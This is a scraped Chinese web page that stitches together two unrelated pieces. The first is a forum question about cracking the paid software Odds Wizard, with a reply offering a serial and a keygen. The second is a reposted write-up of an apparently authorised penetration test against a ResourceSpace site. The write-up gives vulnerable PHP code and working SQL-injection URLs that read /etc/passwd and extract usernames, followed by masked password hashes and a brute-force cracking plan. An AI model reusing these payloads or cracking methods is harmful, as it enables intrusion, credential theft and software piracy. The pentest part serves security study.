谁能帮我破解个MD5,找了半天,网上在线的都解不出来,哪位高手帮帮忙_百度知道关于破解软件我在网上找了一款软件OddsWizard,想去注册可 - 爱问知识人
(window.slotbydup=window.slotbydup || []).push({
id: '2491531',
container: s,
size: '150,90',
display: 'inlay-fix'
关于破解软件
Odds Wizard,想去注册可是因为是国外软件,所以缴费很麻烦,所以想到找一款破解版,网上也没找到他的破解版,谁能教我怎样用一款软件把他破解了,谢谢!
目前网上能找到的最新注册码是V1.71的.有时候相差不大的版本的序列号可以通用,楼主可以试一下.另附V1.71的注册机.
v1.71版本找不到:(
大家还关注成功渗透某授权网站的过程
我们的一个客户希望我们对其网站进行渗透测试,以发现其脆弱点并协助改进安全性。在拿到对方渗透测试授权之后,我们开始了对其网站的分析。
寻找突破口
对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方,于是开始分析其二级域名,发现其中某资源管理分站,目标linux,仅开放HTTP(80端口),整站程序为ResourceSpace,一个开源php建站程序。
因为是开源程序,考虑其漏洞挖掘相对容易一些,于是决定把这个网站作为突破口。于是到resourcespace的官方网站(http://www.resourcespace.org/)下载最新版源代码,在本地本地搭建测试环境,开始白盒审计代码。这个resourcespace大部分功能都是要登陆后才能使用的,而我们目标网站不允许外部注册用户,所以我们要挖掘不需要登录验证就可利用的漏洞。
第一步要挖的是那些容易利用的漏洞,之类的,经过一番grep,在pages/search_disk_usage.php里面发现一处调用:
$results=do_search(getval(&search&,&&),getvalescaped(&restypes&,&&),&relevance&,getval(&archive&,&&),-1,&desc&,false,$starsearch,false,true);
再来看一下include/search_functions.php
if($sql_filter!=&&) {$sql_filter.=& and &;}
$sql_filter.=&archive='$archive'&;
returnsql_query($sql_prefix . &select distinct *,r2.hit_count score from (select$select from resource r $sql_join
where$sql_filter order by ref desc limit $last ) r2 order by $order_by& .$sql_suffix,false,$fetchrows);
这里存在一个典型的漏洞。我们在本地测试环境中访问以下URL来测试:
http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'
证明了注入点确实存在。不过这个超长的嵌套要想利用起来还是有点麻烦的,想构造语句闭合几个语句试了半天没发现合适的方法。因为对方数据库是mysql所以准备利用rand&groupby报错大法来试一下。构造语句是这样的:
http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
果然读到了passwd文件内容,这是利用mysql一个特有的bug来报错的手段,也是常用的方法,对该方法原理不再赘述,感兴趣的请参考:/bug.php?id=8652。
接下来要做是获取管理员密码,进后台传webshell,于是尝试了目标网站:
/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20username%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
返回了加密后的密码,到这里成功的希望就已经相当大了。因为手工注入太麻烦,所以写了个程序来跑出目标网站所有的账号和密码。
admin-----b****d93ce187f01b7e7c96b0b1df062
Sp****erS-----a****437d2e18f2fe5bf
J****J-----9****aa12a24a567cd5d1
n****nph-----6****7f9f3d7ea132ba42d349df99b01
d****e-----1****dd082b77c13ca1ecafd1a0d7ac4
N****iaA-----a****4dfd4c74c15d9e7ab
D****ahT-----c****cb83afadf07dda15b8a7716068a
J****P-----d****001e3b5f47b8ae6
b****rtm-----9****6d20cd016ffb3bcf3
J****R-----a****4b643d1e69aa8d51f9c616e46c9
L****A-----b****7d728a7048add07bac
密码看起来像是MD5加密的,不过进一步查看源代码却发现形势不容乐观,加密是加用户名salt后MD5的:
md5($salt+$username+$pass)
这意味着无法在cmd5等网站查询,也无法使用彩虹表破解,而只能选择暴力破解:(但resourcespace的默认密码策略是要求密码必须同时使用字母和数字的,这样破解的希望就更小了,于是乎写了个破解程序:
挂上我们的NB字典开始跑密码,本来没抱太大希望,但是希望总是留给勇于尝试的人,还真有一个用户使用了弱口令。
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】